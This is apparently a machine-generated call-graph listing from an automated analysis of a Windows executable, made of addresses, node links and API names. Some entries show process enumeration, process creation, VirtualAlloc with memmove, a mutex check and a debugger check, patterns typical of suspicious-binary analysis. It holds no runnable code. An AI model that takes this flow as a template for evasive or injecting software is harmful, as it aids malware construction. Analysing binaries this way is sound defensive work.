__getptd_noexit 21898->21956 21902 aacfd7 RtlAllocateHeap 21901->21902 21905 aad004 21901->21905 21909 aad002 21901->21909 21911 ab67c1 21901->21911 21920 ab6612 21901->21920 21949 aac984 21901->21949 21952 ab6403 DecodePointer 21901->21952 21902->21901 21903 aad010 21902->21903 21903->21890 21953 aadb06 76 API calls __getptd_noexit 21905->21953 21954 aadb06 76 API calls __getptd_noexit 21909->21954 21957 ac064d 21911->21957 21913 ab67c8 21914 ac064d __NMSG_WRITE 76 API calls 21913->21914 21918 ab67d5 21913->21918 21914->21918 21915 ab6612 __NMSG_WRITE 76 API calls 21916 ab67ed 21915->21916 21917 ab6612 __NMSG_WRITE 76 API calls 21916->21917 21919 ab67f7 21917->21919 21918->21915 21918->21919 21919->21901 21921 ab6633 __NMSG_WRITE 21920->21921 21922 ab67b2 21921->21922 21923 ac064d __NMSG_WRITE 73 API calls 21921->21923 21966 aab46a 21922->21966 21925 ab664d 21923->21925 21927 ab675e GetStdHandle 21925->21927 21928 ac064d __NMSG_WRITE 73 API calls 21925->21928 21926 ab67bf 21926->21901 21927->21922 21931 ab676c 21927->21931 21929 ab665e 21928->21929 21929->21927 21930 ab6670 21929->21930 21930->21922 21932 ab667c 21930->21932 21931->21922 21933 ab678b _strlen 21931->21933 21974 aafcea 76 API calls ___crtsetenv 21932->21974 21936 ab67a2 WriteFile 21933->21936 21935 ab6691 21937 ab669c GetModuleFileNameW 21935->21937 21944 ab66c9 21935->21944 21936->21922 21938 ab66bd 21937->21938 21942 ab66dc _wcslen 21937->21942 21975 aafcea 76 API calls ___crtsetenv 21938->21975 21942->21944 21977 ab0df1 76 API calls ___crtsetenv 21942->21977 21978 ac05d8 76 API calls ___crtsetenv 21942->21978 21944->21942 21946 ab673f 21944->21946 21976 ab4b3b 10 API calls __call_reportfault 21944->21976 21979 ac05d8 76 API calls ___crtsetenv 21944->21979 21980 ac046c 22 API calls 2 library calls 21946->21980 21948 ab674f 21948->21922 21982 aac959 GetModuleHandleW 21949->21982 21952->21901 21953->21909 21954->21903 21955->21898 21956->21903 21958 ac0659 21957->21958 21960 ac0663 21958->21960 21964 aadb06 76 API calls __getptd_noexit 21958->21964 21960->21913 21961 ac067c 21965 ab4b8d 11 API calls ___crtsetenv 21961->21965 21963 ac0687 21963->21913 21964->21961 21965->21963 21967 aab472 21966->21967 21968 aab474 IsDebuggerPresent 21966->21968 21967->21926 21981 ac0028 21968->21981 21971 ab3352 SetUnhandledExceptionFilter UnhandledExceptionFilter 21972 ab336f __call_reportfault 21971->21972 21973 ab3377 GetCurrentProcess TerminateProcess 21971->21973 21972->21973 21973->21926 21974->21935 21975->21944 21976->21942 21977->21942 21978->21942 21979->21944 21980->21948 21981->21971 21983 aac96d GetProcAddress 21982->21983 21984 aac982 ExitProcess 21982->21984 21983->21984 21985 aac97d 21983->21985 21985->21984 22004 9af29a 21986->22004 22010 9af302 21986->22010 22018 9af344 21986->22018 22026 9af387 21986->22026 22032 9af2e0 21986->22032 22039 9af316 21986->22039 22047 9af330 21986->22047 22054 9af390 21986->22054 22060 9aeef6 21986->22060 22105 9af2b0 21986->22105 21987 9aa7ca 21988 9aa7e1 21987->21988 22114 9aa646 21987->22114 21988->21869 22002 9ad4d9 132 API calls 2 library calls 21988->22002 22001->21866 22002->21869 22005 9af2a3 22004->22005 22119 9a44b0 22005->22119 22008 9af4bc 22008->21987 22011 9af30b 22010->22011 22012 9ac90b 110 API calls 22011->22012 22013 9af2a7 22012->22013 22014 9af2ab 22013->22014 22017 9a44b0 234 API calls 22013->22017 22698 9ab846 LeaveCriticalSection RaiseException ctype 22014->22698 22016 9af4bc 22016->21987 22017->22014 22019 9af35b 22018->22019 22022 9af2ab 22018->22022 22020 9ac90b 110 API calls 22019->22020 22021 9af2a7 22020->22021 22025 9a44b0 234 API calls 22021->22025 22699 9ab846 LeaveCriticalSection RaiseException ctype 22022->22699 22024 9af4bc 22024->21987 22025->22022 22027 9af2ab 22026->22027 22028 9af2a7 22026->22028 22700 9ab846 LeaveCriticalSection RaiseException ctype 22027->22700 22028->22027 22031 9a44b0 234 API calls 22028->22031 22030 9af4bc 22030->21987 22031->22027 22701 9bc05d 22032->22701 22034 9af2a7 22035 9af2ab 22034->22035 22038 9a44b0 234 API calls 22034->22038 22036 9ab846 LeaveCriticalSection RaiseException 22035->22036 22037 9af4bc 22036->22037 22037->21987 22038->22035 22040 9af30b 22039->22040 22045 9af2ab 22039->22045 22041 9ac90b 110 API calls 22040->22041 22044 9af2a7 22041->22044 22043 9af4bc 22043->21987 22044->22045 22046 9a44b0 234 API calls 22044->22046 22705 9ab846 LeaveCriticalSection RaiseException ctype 22045->22705 22046->22045 22048 9ac90b 110 API calls 22047->22048 22049 9af2a7 22047->22049 22048->22049 22050 9af2ab 22049->22050 22053 9a44b0 234 API calls 22049->22053 22706 9ab846 LeaveCriticalSection RaiseException ctype 22050->22706 22052 9af4bc 22052->21987 22053->22050 22055 9af2a3 22054->22055 22056 9af2ab 22054->22056 22059 9a44b0 234 API calls 22055->22059 22707 9ab846 LeaveCriticalSection RaiseException ctype 22056->22707 22058 9af4bc 22058->21987 22059->22056 22061 9aef05 __EH_prolog3 22060->22061 22062 9aef21 22061->22062 22063 9aef8a 22061->22063 22064 9aef7a 22061->22064 22068 9aef37 std::locale::_Init 22062->22068 22725 9ab846 LeaveCriticalSection RaiseException ctype 22062->22725 22065 9aef8f 22063->22065 22073 9aefa3 22063->22073 22066 9ac90b 110 API calls 22064->22066 22721 9ae919 118 API calls ctype 22065->22721 22070 9aef80 22066->22070 22068->21987 22732 9ab846 LeaveCriticalSection RaiseException ctype 22068->22732 22720 9ae8a1 117 API calls 22070->22720 22071 9aef9f 22071->22068 22071->22073 22073->22068 22708 9ab812 22073->22708 22075 9af4bc 22075->21987 22079 9af0fa 22724 9ab846 LeaveCriticalSection RaiseException ctype 22079->22724 22080 9af041 22080->22062 22080->22068 22080->22079 22082 9af15b 22080->22082 22083 9af12f 22080->22083 22084 9af232 22080->22084 22085 9af177 22080->22085 22086 9af185 22080->22086 22089 9af137 22080->22089 22090 9af488 22080->22090 22098 9af1fb 22080->22098 22723 9ab846 LeaveCriticalSection RaiseException ctype 22080->22723 22082->22068 22092 9ac90b 110 API calls 22082->22092 22726 9bad30 109 API calls 22083->22726 22084->22068 22093 9ac90b 110 API calls 22084->22093 22088 9ac90b 110 API calls 22085->22088 22727 9ab862 109 API calls 22086->22727 22088->22068 22714 9a89d9 22089->22714 22731 9ab846 LeaveCriticalSection RaiseException ctype 22090->22731 22092->22068 22093->22068 22096 9af1a2 22097 9ac937 109 API calls 22096->22097 22100 9af1b4 22097->22100 22730 9badc5 110 API calls 22098->22730 22101 9af1ca 22100->22101 22728 9c2bbf RaiseException moneypunct ctype 22100->22728 22729 9ad6cc 110 API calls 3 library calls 22101->22729 22106 9ac90b 110 API calls 22105->22106 22107 9af2b8 22106->22107 22108 9ac90b 110 API calls 22107->22108 22109 9af2a7 22108->22109 22110 9af2ab 22109->22110 22113 9a44b0 234 API calls 22109->22113 22786 9ab846 LeaveCriticalSection RaiseException ctype 22110->22786 22112 9af4bc 22112->21987 22113->22110 22115 9aa677 CallWindowProcA 22114->22115 22116 9aa655 22114->22116 22117 9aa68a 22115->22117 22116->22115 22118 9aa663 DefWindowProcA 22116->22118 22117->21988 22118->22117 22127 9a8331 22119->22127 22126 9ab846 LeaveCriticalSection RaiseException ctype 22126->22008 22153 9ac865 22127->22153 22130 9a44c4 22132 9a3df0 22130->22132 22133 9a3e4f _memset 22132->22133 22134 9a3e9d 7 API calls 22133->22134 22232 9a3c20 22134->22232 22137 9a3c20 145 API calls 22138 9a3f47 22137->22138 22139 9a3c20 145 API calls 22138->22139 22141 9a3f5f _memset 22139->22141 22140 9a3fe3 22256 9a13b0 22140->22256 22141->22140 22142 9a6291 std::_Mutex::_Mutex 76 API calls 22141->22142 22144 9a3faf 22142->22144 22147 9a3fc3 22144->22147 22146 aab46a __write_nolock 5 API calls 22148 9a4038 Sleep 22146->22148 22271 9a41d0 88 API calls __write_nolock 22147->22271 22150 aacbdc 22148->22150 22668 aaca9c 22150->22668 22152 9a44f1 22152->22126 22154 9bcdbd ctype 103 API calls 22153->22154 22155 9ac879 22154->22155 22156 9a833e 22155->22156 22173 9b8782 RaiseException __CxxThrowException@8 22155->22173 22156->22130 22158 9a81b8 22156->22158 22159 9a828c 22158->22159 22161 9a81dc 22158->22161 22160 aab46a __write_nolock 5 API calls 22159->22160 22162 9a82bc 22160->22162 22174 9b0a7a 22161->22174 22162->22130 22164 9a8217 22165 9a828e 22164->22165 22166 9a8220 22164->22166 22177 9ad091 22165->22177 22167 9ad091 125 API calls 22166->22167 22169 9a8249 22167->22169 22170 9ad091 125 API calls 22169->22170 22171 9a8266 22170->22171 22200 9b0dd3 SetWindowPos 22171->22200 22175 9b0a8c 22174->22175 22176 9b0a80 GetWindowLongA 22174->22176 22176->22164 22178 9ad0cd GetClientRect 22177->22178 22179 9ad0c4 22177->22179 22178->22179 22180 9ad0ea BeginDeferWindowPos 22179->22180 22181 9ad0f7 22179->22181 22182 9ad0fb GetTopWindow 22180->22182 22181->22182 22183 9ad10f GetDlgCtrlID 22182->22183 22195 9ad157 22182->22195 22186 9ac937 109 API calls 22183->22186 22184 9ad15f 22188 9ad171 22184->22188 22189 9ad164 CopyRect 22184->22189 22185 9ad184 22190 9ad1d8 22185->22190 22201 9ac90b 22185->22201 22187 9ad11e 22186->22187 22192 9ad148 GetWindow 22187->22192 22197 9ad136 SendMessageA 22187->22197 22193 aab46a __write_nolock 5 API calls 22188->22193 22189->22188 22190->22188 22191 9ad1dd KiUserCallbackDispatcher 22190->22191 22191->22188 22192->22183 22192->22195 22196 9ad1f3 22193->22196 22195->22184 22195->22185 22196->22159 22197->22192 22200->22159 22202 9ac897 ctype 109 API calls 22201->22202 22203 9ac919 22202->22203 22209 9c2e0e 22203->22209 22205 9ac925 22221 9b0e7c 22205->22221 22208 9aa887 12 API calls __write_nolock 22208->22190 22210 9c2e1a __EH_prolog3_catch 22209->22210 22220 9c2e23 std::locale::_Init ctype 22210->22220 22226 9c2bbf RaiseException moneypunct ctype 22210->22226 22212 9c2e36 22212->22220 22227 9c2bbf RaiseException moneypunct ctype 22212->22227 22214 9c2e43 ctype 22214->22220 22228 9fb7b3 77 API calls 22214->22228 22216 9c2e72 22217 9c2e7d 22216->22217 22229 9b874a RaiseException __CxxThrowException@8 22216->22229 22230 9c2c32 77 API calls ctype 22217->22230 22220->22205 22222 9b0e88 22221->22222 22225 9ac92f 22221->22225 22223 9b0e8e GetParent 22222->22223 22222->22225 22231 9c2bbf RaiseException moneypunct ctype 22223->22231 22225->22190 22225->22208 22226->22212 22227->22214 22228->22216 22230->22220 22231->22225 22233 9a3c6f _memset 22232->22233 22272 9a39a0 22233->22272 22235 9a3c7f 22282 9a18a0 22235->22282 22239 9a3cee 22241 9a3d0d VirtualAlloc 22239->22241 22301 aac938 22239->22301 22243 9a3d39 _memmove 22241->22243 22304 9a3010 22243->22304 22248 9a3d9e 22320 9a3af0 22248->22320 22250 9a18a0 77 API calls 22250->22248 22253 9a3dc6 22254 aab46a __write_nolock 5 API calls 22253->22254 22255 9a3de6 22254->22255 22255->22137 22257 9a13bd __write_nolock 22256->22257 22656 9a12c0 CreateToolhelp32Snapshot Process32First 22257->22656 22259 9a13d5 22260 9a15e7 22259->22260 22263 9a13e0 _memset 22259->22263 22261 aab46a __write_nolock 5 API calls 22260->22261 22262 9a15f2 CreateProcessA 22261->22262 22262->22146 22264 9a145c 7 API calls 22263->22264 22667 aab050 22264->22667 22266 9a14e0 lstrcpyA CoInitialize CoCreateInstance 22268 9a1527 22266->22268 22269 9a15b8 CoUninitialize Sleep 22266->22269 22268->22269 22270 9a1584 MultiByteToWideChar 22268->22270 22269->22260 22270->22269 22271->22140 22273 9a39d7 22272->22273 22330 9a19d0 22273->22330 22275 9a3a15 22342 9a2be0 22275->22342 22278 9a3a47 22351 9a2380 22278->22351 22279 9a18a0 77 API calls 22279->22278 22283 9a18ba 22282->22283 22284 9a1977 GetTickCount 22282->22284 22287 9a18c9 22283->22287 22440 aab8c9 RaiseException 22283->22440 22298 aac926 22284->22298 22286 9a1908 22289 9a1942 22286->22289 22443 aaaf07 76 API calls std::exception::_Copy_str 22286->22443 22287->22286 22441 aaaf07 76 API calls std::exception::_Copy_str 22287->22441 22445 aaaf07 76 API calls std::exception::_Copy_str 22289->22445 22290 9a18ed 22442 aab8c9 RaiseException 22290->22442 22293 9a195c 22446 aab8c9 RaiseException 22293->22446 22295 9a1927 22444 aab8c9 RaiseException 22295->22444 22447 ab4284 22298->22447 22302 ab4284 __getptd 76 API calls 22301->22302 22303 aac93d 22302->22303 22303->22239 22305 9a3055 22304->22305 22306 9a3079 22305->22306 22511 9a2800 77 API calls 22305->22511 22308 9a3093 22306->22308 22507 9a1ce0 22306->22507 22309 9a18a0 77 API calls 22308->22309 22310 9a3125 22308->22310 22309->22310 22312 9a313c 22310->22312 22512 9a2b80 77 API calls 22310->22512 22314 9a3870 22312->22314 22315 9a3892 22314->22315 22316 9a387e 22314->22316 22315->22248 22315->22250 22547 9a3370 22316->22547 22321 9a3b44 22320->22321 22322 9a3b6f 22321->22322 22323 9a3870 113 API calls 22321->22323 22643 9a1ab0 22322->22643 22323->22322 22326 ac6167 22327 ac6176 std::ios_base::_Tidy 22326->22327 22329 ac619b ctype 22327->22329 22655 9a10d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 22327->22655 22329->22253 22331 9a18a0 77 API calls 22330->22331 22332 9a1a0a 22331->22332 22333 9a6291 std::_Mutex::_Mutex 76 API calls 22332->22333 22334 9a1a11 22333->22334 22335 9a1a53 22334->22335 22362 ac5df9 22334->22362 22335->22275 22337 9a1a1f 22378 ac5aed 22337->22378 22395 9a1170 22342->22395 22347 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22348 9a2c3b 22347->22348 22349 ac5b15 std::locale::_Init LeaveCriticalSection 22348->22349 22350 9a2c5c 22349->22350 22350->22278 22350->22279 22434 ac6394 22351->22434 22354 9a6291 std::_Mutex::_Mutex 76 API calls 22355 9a23c9 22354->22355 22356 ac5df9 std::locale::_Init 79 API calls 22355->22356 22361 9a23fe 22355->22361 22357 9a23d7 22356->22357 22358 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22357->22358 22359 9a23ea 22358->22359 22360 ac5b15 std::locale::_Init LeaveCriticalSection 22359->22360 22360->22361 22361->22235 22363 ac5e05 __EH_prolog3 22362->22363 22364 ac5e80 std::locale::_Init 22363->22364 22365 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22363->22365 22364->22337 22366 ac5e1b 22365->22366 22367 9a6291 std::_Mutex::_Mutex 76 API calls 22366->22367 22377 ac5e6a 22366->22377 22370 ac5e30 22367->22370 22368 ac5b15 std::locale::_Init LeaveCriticalSection 22368->22364 22369 ac5e3d 22386 ac5bbe 22369->22386 22370->22369 22390 ac5d56 76 API calls _Yarn 22370->22390 22375 ac5e5d 22392 9a1050 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 22375->22392 22377->22368 22379 9a1a32 22378->22379 22380 ac5aff 22378->22380 22382 ac5b15 22379->22382 22393 ac64ce EnterCriticalSection 22380->22393 22383 ac5b1c 22382->22383 22385 9a1a49 22382->22385 22394 ac64de LeaveCriticalSection 22383->22394 22385->22275 22387 ac5bcc 22386->22387 22388 ac5bdd 22386->22388 22389 ac64ee std::locale::_Setgloballocale RtlEncodePointer 22387->22389 22391 ac5cb1 76 API calls 3 library calls 22388->22391 22389->22388 22390->22369 22391->22375 22392->22377 22393->22379 22394->22385 22396 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22395->22396 22397 9a1191 22396->22397 22398 ac5b15 std::locale::_Init LeaveCriticalSection 22397->22398 22399 9a11a5 22398->22399 22400 9a25e0 22399->22400 22401 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22400->22401 22402 9a2612 22401->22402 22403 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22402->22403 22405 9a2656 22402->22405 22404 9a2635 22403->22404 22407 ac5b15 std::locale::_Init LeaveCriticalSection 22404->22407 22406 9a2696 22405->22406 22421 9a2200 22405->22421 22408 ac5b15 std::locale::_Init LeaveCriticalSection 22406->22408 22407->22405 22410 9a2706 22408->22410 22410->22347 22410->22350 22412 9a26c7 22413 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22412->22413 22415 9a26da 22413->22415 22418 ac5b15 std::locale::_Init LeaveCriticalSection 22415->22418 22416 9a26b9 22432 aab8c9 RaiseException 22416->22432 22419 9a26ee 22418->22419 22433 ac5b41 76 API calls std::_Mutex::_Mutex 22419->22433 22422 9a22c3 22421->22422 22423 9a2237 22421->22423 22422->22412 22431 aaaf63 76 API calls std::exception::exception 22422->22431 22423->22422 22424 9a6291 std::_Mutex::_Mutex 76 API calls 22423->22424 22426 9a2246 22424->22426 22425 9a228c 22425->22422 22427 9a2150 112 API calls 22425->22427 22426->22425 22428 9a20a0 113 API calls 22426->22428 22427->22422 22429 9a2271 22428->22429 22430 ac5a33 __Getctype 84 API calls 22429->22430 22430->22425 22431->22416 22432->22412 22433->22406 22435 9a6291 std::_Mutex::_Mutex 76 API calls 22434->22435 22436 ac63a0 22435->22436 22439 ac64ae InitializeCriticalSection 22436->22439 22438 9a23bb 22438->22354 22439->22438 22440->22287 22441->22290 22442->22286 22443->22295 22444->22289 22445->22293 22446->22284 22452 ab420b GetLastError 22447->22452 22449 ab428c 22450 aac930 22449->22450 22466 aacc26 22449->22466 22450->22239 22485 ab40c9 TlsGetValue 22452->22485 22455 ab4278 SetLastError 22455->22449 22458 ab423e DecodePointer 22459 ab4253 22458->22459 22460 ab426f 22459->22460 22461 ab4257 22459->22461 22495 aab4ab 22460->22495 22494 ab4157 76 API calls 3 library calls 22461->22494 22464 ab425f GetCurrentThreadId 22464->22455 22465 ab4275 22465->22455 22467 ab67c1 __FF_MSGBANNER 71 API calls 22466->22467 22468 aacc30 22467->22468 22469 ab6612 __NMSG_WRITE 71 API calls 22468->22469 22470 aacc38 22469->22470 22501 aacbf2 22470->22501 22473 aacc72 22474 aaccf3 22473->22474 22504 ab00ce 76 API calls ___crtsetenv 22473->22504 22474->22450 22476 aacc84 22477 aaccd6 EncodePointer EncodePointer 22476->22477 22478 aaccae 22476->22478 22479 aacc9f 22476->22479 22477->22474 22478->22474 22480 aacca8 22478->22480 22505 ab4ddb 76 API calls __realloc_crt 22479->22505 22480->22478 22483 aaccc4 EncodePointer 22480->22483 22506 ab4ddb 76 API calls __realloc_crt 22480->22506 22483->22477 22484 aaccbe 22484->22474 22484->22483 22486 ab40f9 22485->22486 22487 ab40de DecodePointer TlsSetValue 22485->22487 22486->22455 22488 ab4d8f 22486->22488 22487->22486 22490 ab4d98 22488->22490 22489 abb065 _calloc 75 API calls 22489->22490 22490->22489 22491 ab4236 22490->22491 22492 ab4db6 Sleep 22490->22492 22491->22455 22491->22458 22493 ab4dcb 22492->22493 22493->22490 22493->22491 22494->22464 22496 aab4df __dosmaperr 22495->22496 22497 aab4b6 HeapFree 22495->22497 22496->22465 22497->22496 22498 aab4cb 22497->22498 22499 aadb06 ___crtsetenv 74 API calls 22498->22499 22500 aab4d1 GetLastError 22499->22500 22500->22496 22502 aaca9c __amsg_exit 76 API calls 22501->22502 22503 aacc03 RtlDecodePointer DecodePointer 22502->22503 22503->22473 22503->22474 22504->22476 22505->22480 22506->22484 22508 9a1cfa _memmove 22507->22508 22509 9a1d9f 22507->22509 22508->22509 22513 9a34b0 22508->22513 22509->22308 22511->22306 22512->22312 22516 9a34eb 22513->22516 22522 9a34ff 22513->22522 22514 aab46a __write_nolock 5 API calls 22515 9a3697 22514->22515 22515->22508 22517 9a3540 22516->22517 22521 9a3560 22516->22521 22516->22522 22525 aabd75 22517->22525 22519 9a3630 22519->22522 22546 9a2850 109 API calls _fputc 22519->22546 22521->22519 22521->22522 22544 aac61a 109 API calls 3 library calls 22521->22544 22545 9a2e10 77 API calls std::_Xinvalid_argument 22521->22545 22522->22514 22526 aabd81 __initptd 22525->22526 22527 aabdac 22526->22527 22528 aabd94 22526->22528 22530 aac094 __lock_file 77 API calls 22527->22530 22529 aadb06 ___crtsetenv 76 API calls 22528->22529 22531 aabd99 22529->22531 22532 aabdb2 22530->22532 22533 ab4b8d ___crtsetenv 11 API calls 22531->22533 22534 ab2cd9 __ungetc_nolock 76 API calls 22532->22534 22538 aabe27 22532->22538 22540 aabda4 __initptd 22533->22540 22537 aabdc2 22534->22537 22535 aabe35 22536 aabe69 _fputc LeaveCriticalSection LeaveCriticalSection 22535->22536 22536->22540 22537->22538 22541 aadb06 ___crtsetenv 76 API calls 22537->22541 22538->22535 22539 ab4b9d __flsbuf 107 API calls 22538->22539 22539->22535 22540->22522 22542 aabe1c 22541->22542 22543 ab4b8d ___crtsetenv 11 API calls 22542->22543 22543->22538 22544->22521 22545->22521 22546->22522 22550 9a341c 22547->22550 22553 9a33a8 22547->22553 22548 aab46a __write_nolock 5 API calls 22549 9a34ab 22548->22549 22554 aac8b2 22549->22554 22550->22548 22553->22550 22567 aac61a 109 API calls 3 library calls 22553->22567 22568 9a2e10 77 API calls std::_Xinvalid_argument 22553->22568 22555 aac8be __initptd 22554->22555 22556 aac8d0 22555->22556 22557 aac8e5 22555->22557 22591 aadb06 76 API calls __getptd_noexit 22556->22591 22561 aac8e0 __initptd 22557->22561 22569 aac094 22557->22569 22560 aac8d5 22592 ab4b8d 11 API calls ___crtsetenv 22560->22592 22561->22315 22567->22553 22568->22553 22570 aac0c8 EnterCriticalSection 22569->22570 22571 aac0a6 22569->22571 22572 aac0be 22570->22572 22571->22570 22573 aac0ae 22571->22573 22575 aac845 22572->22575 22594 ab5091 22573->22594 22576 aac856 22575->22576 22578 aac86a 22575->22578 22641 aadb06 76 API calls __getptd_noexit 22576->22641 22580 aac866 22578->22580 22601 aac172 22578->22601 22579 aac85b 22642 ab4b8d 11 API calls ___crtsetenv 22579->22642 22593 aac91e LeaveCriticalSection LeaveCriticalSection _setvbuf 22580->22593 22587 aac884 22618 ab5f61 22587->22618 22589 aac88a 22589->22580 22590 aab4ab _free 76 API calls 22589->22590 22590->22580 22591->22560 22592->22561 22593->22561 22595 ab50b9 EnterCriticalSection 22594->22595 22596 ab50a6 22594->22596 22595->22572 22597 ab4fcf __mtinitlocknum 75 API calls 22596->22597 22598 ab50ac 22597->22598 22598->22595 22599 aacc26 __amsg_exit 75 API calls 22598->22599 22600 ab50b8 22599->22600 22600->22595 22602 aac1ad 22601->22602 22603 aac18b 22601->22603 22607 ab596e 22602->22607 22603->22602 22604 ab2cd9 __ungetc_nolock 76 API calls 22603->22604 22605 aac1a6 22604->22605 22606 ab57c1 __write 107 API calls 22605->22606 22606->22602 22608 ab597e 22607->22608 22609 aac87e 22607->22609 22608->22609 22610 aab4ab _free 76 API calls 22608->22610 22611 ab2cd9 22609->22611 22610->22609 22612 ab2cfa 22611->22612 22613 ab2ce5 22611->22613 22612->22587 22614 aadb06 ___crtsetenv 76 API calls 22613->22614 22615 ab2cea 22614->22615 22616 ab4b8d ___crtsetenv 11 API calls 22615->22616 22617 ab2cf5 22616->22617 22617->22587 22619 ab5f6d __initptd 22618->22619 22620 ab5f90 22619->22620 22621 ab5f75 22619->22621 22623 ab5f9c 22620->22623 22626 ab5fd6 22620->22626 22622 aadb19 __write_nolock 76 API calls 22621->22622 22624 ab5f7a 22622->22624 22625 aadb19 __write_nolock 76 API calls 22623->22625 22627 aadb06 ___crtsetenv 76 API calls 22624->22627 22628 ab5fa1 22625->22628 22629 ab2a7a ___lock_fhandle 78 API calls 22626->22629 22635 ab5f82 __initptd 22627->22635 22630 aadb06 ___crtsetenv 76 API calls 22628->22630 22631 ab5fdc 22629->22631 22632 ab5fa9 22630->22632 22633 ab5fea 22631->22633 22634 ab5ff6 22631->22634 22636 ab4b8d ___crtsetenv 11 API calls 22632->22636 22637 ab5ec5 __close_nolock 79 API calls 22633->22637 22638 aadb06 ___crtsetenv 76 API calls 22634->22638 22635->22589 22636->22635 22639 ab5ff0 22637->22639 22638->22639 22640 ab601d __close LeaveCriticalSection 22639->22640 22640->22635 22641->22579 22642->22580 22644 9a1aca 22643->22644 22650 9a1afc ctype 22643->22650 22647 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22644->22647 22644->22650 22646 9a1b1f 22646->22326 22648 9a1adb 22647->22648 22649 ac5b15 std::locale::_Init LeaveCriticalSection 22648->22649 22649->22650 22651 ac63ae 22650->22651 22654 ac64be DeleteCriticalSection 22651->22654 22653 ac63ba ctype 22653->22646 22654->22653 22655->22329 22657 9a1316 Process32Next 22656->22657 22658 9a1306 22656->22658 22660 9a138f FindCloseChangeNotification 22657->22660 22664 9a132d 22657->22664 22659 aab46a __write_nolock 5 API calls 22658->22659 22661 9a1312 22659->22661 22662 aab46a __write_nolock 5 API calls 22660->22662 22661->22259 22663 9a13a8 22662->22663 22663->22259 22665 9a1369 Process32Next 22664->22665 22666 9a1380 22664->22666 22665->22664 22665->22666 22666->22660 22667->22266 22669 aacaa8 __initptd 22668->22669 22670 ab5091 __lock 71 API calls 22669->22670 22671 aacaaf 22670->22671 22673 aacada RtlDecodePointer 22671->22673 22677 aacb59 22671->22677 22675 aacaf1 DecodePointer 22673->22675 22673->22677 22682 aacb04 22675->22682 22676 aacbd6 __initptd 22676->22152 22689 aacbc7 22677->22689 22680 aacbbe 22681 aac984 __mtinitlocknum 3 API calls 22680->22681 22683 aacbc7 22681->22683 22682->22677 22684 aacb1b DecodePointer 22682->22684 22688 aacb2a DecodePointer DecodePointer 22682->22688 22694 ab4097 RtlEncodePointer 22682->22694 22687 aacbd4 22683->22687 22696 ab4fb8 LeaveCriticalSection 22683->22696 22695 ab4097 RtlEncodePointer 22684->22695 22687->22152 22688->22682 22690 aacbcd 22689->22690 22691 aacba7 22689->22691 22697 ab4fb8 LeaveCriticalSection 22690->22697 22691->22676 22693 ab4fb8 LeaveCriticalSection 22691->22693 22693->22680 22694->22682 22695->22682 22696->22687 22697->22691 22698->22016 22699->22024 22700->22030 22704 9bbfe9 109 API calls 4 library calls 22701->22704 22703 9bc069 22704->22703 22705->22043 22706->22052 22707->22058 22709 9ab824 22708->22709 22710 9ab83c 22709->22710 22733 9b8782 RaiseException __CxxThrowException@8 22709->22733 22712 9c2a0c ctype 6 API calls 22710->22712 22713 9ab842 22712->22713 22713->22080 22722 9ab846 LeaveCriticalSection RaiseException ctype 22713->22722 22715 9a89ea 22714->22715 22716 9a89e5 22714->22716 22734 9a705a 22715->22734 22742 9b8782 RaiseException __CxxThrowException@8 22716->22742 22720->22063 22721->22071 22722->22080 22723->22080 22724->22062 22725->22068 22727->22096 22728->22101 22729->22098 22730->22068 22731->22068 22732->22075 22735 9ac865 103 API calls 22734->22735 22737 9a7067 22735->22737 22736 9a706c 22736->22068 22737->22736 22743 9a7033 22737->22743 22739 9a7085 PostMessageA 22740 9a70a6 22739->22740 22740->22736 22744 9a703f 22743->22744 22745 9a704f 22743->22745 22744->22745 22747 9a6fa0 22744->22747 22745->22736 22745->22739 22748 9a6fc1 22747->22748 22750 9a6fcc 22748->22750 22777 9b8782 RaiseException __CxxThrowException@8 22748->22777 22761 9bb845 22750->22761 22752 9a6fd1 22753 9a6fd7 22752->22753 22765 9ab9ba 22752->22765 22754 aab46a __write_nolock 5 API calls 22753->22754 22756 9a702f 22754->22756 22756->22745 22758 9a700b 22758->22753 22772 9b0ada 22758->22772 22762 9bb851 __EH_prolog3_catch 22761->22762 22763 9bb863 std::locale::_Init 22762->22763 22778 9b8782 RaiseException __CxxThrowException@8 22762->22778 22763->22752 22766 9ab9c9 22765->22766 22768 9aed99 117 API calls 22766->22768 22767 9a7000 22767->22753 22769 9b0a94 22767->22769 22768->22767 22770 9b0a9a GetWindowLongA 22769->22770 22771 9b0aa6 22769->22771 22770->22758 22773 9b0afa 22772->22773 22774 9b0ae5 22772->22774 22779 9aa609 22774->22779 22782 9aa59b GetWindowLongA 22779->22782 22783 9aa5ba 22782->22783 22784 9aa5be SetWindowLongA 22782->22784 22783->22753 22784->22783 22785 9aa5d4 SetWindowPos 22784->22785 22785->22783 22786->22112 22787 9a47d0 22814 9b5c3b 22787->22814 22790 9a481e 22792 9a483b 22790->22792 22793 9a4825 CloseHandle 22790->22793 22791 9a4833 CloseHandle 22791->22792 22822 9b3218 22792->22822 22794 aacbdc 76 API calls 22793->22794 22794->22791 22798 9a4850 22799 9a6291 std::_Mutex::_Mutex 76 API calls 22798->22799 22800 9a485a 22799->22800 22801 9a4886 22800->22801 22839 9b513d 22800->22839 22842 9b3bae 22801->22842 22804 9a4898 22846 9b2204 22804->22846 22806 9a48a0 22858 9b39fe 22806->22858 22808 9a48bd 22809 9a48df 22808->22809 22810 9a48c1 ctype 22808->22810 22877 9b0bd1 ShowWindow 22809->22877 22812 9a48e9 UpdateWindow 22813 9a4901 ctype 22812->22813 22815 9b5c48 22814->22815 22816 9b5c62 22814->22816 22817 9bc8c9 ctype 7 API calls 22815->22817 22818 9bd77f ctype 109 API calls 22816->22818 22819 9b5c57 22817->22819 22820 9a4800 CreateMutexA GetLastError 22818->22820 22819->22816 22878 9b8782 RaiseException __CxxThrowException@8 22819->22878 22820->22790 22820->22791 22823 aab4ab _free 76 API calls 22822->22823 22824 9b3228 22823->22824 22879 aaf4c4 22824->22879 22827 aab4ab _free 76 API calls 22828 9b323b 22827->22828 22829 aaf4c4 __strdup 76 API calls 22828->22829 22830 9a4847 22829->22830 22831 9b1645 22830->22831 22832 9b1651 __EH_prolog3 22831->22832 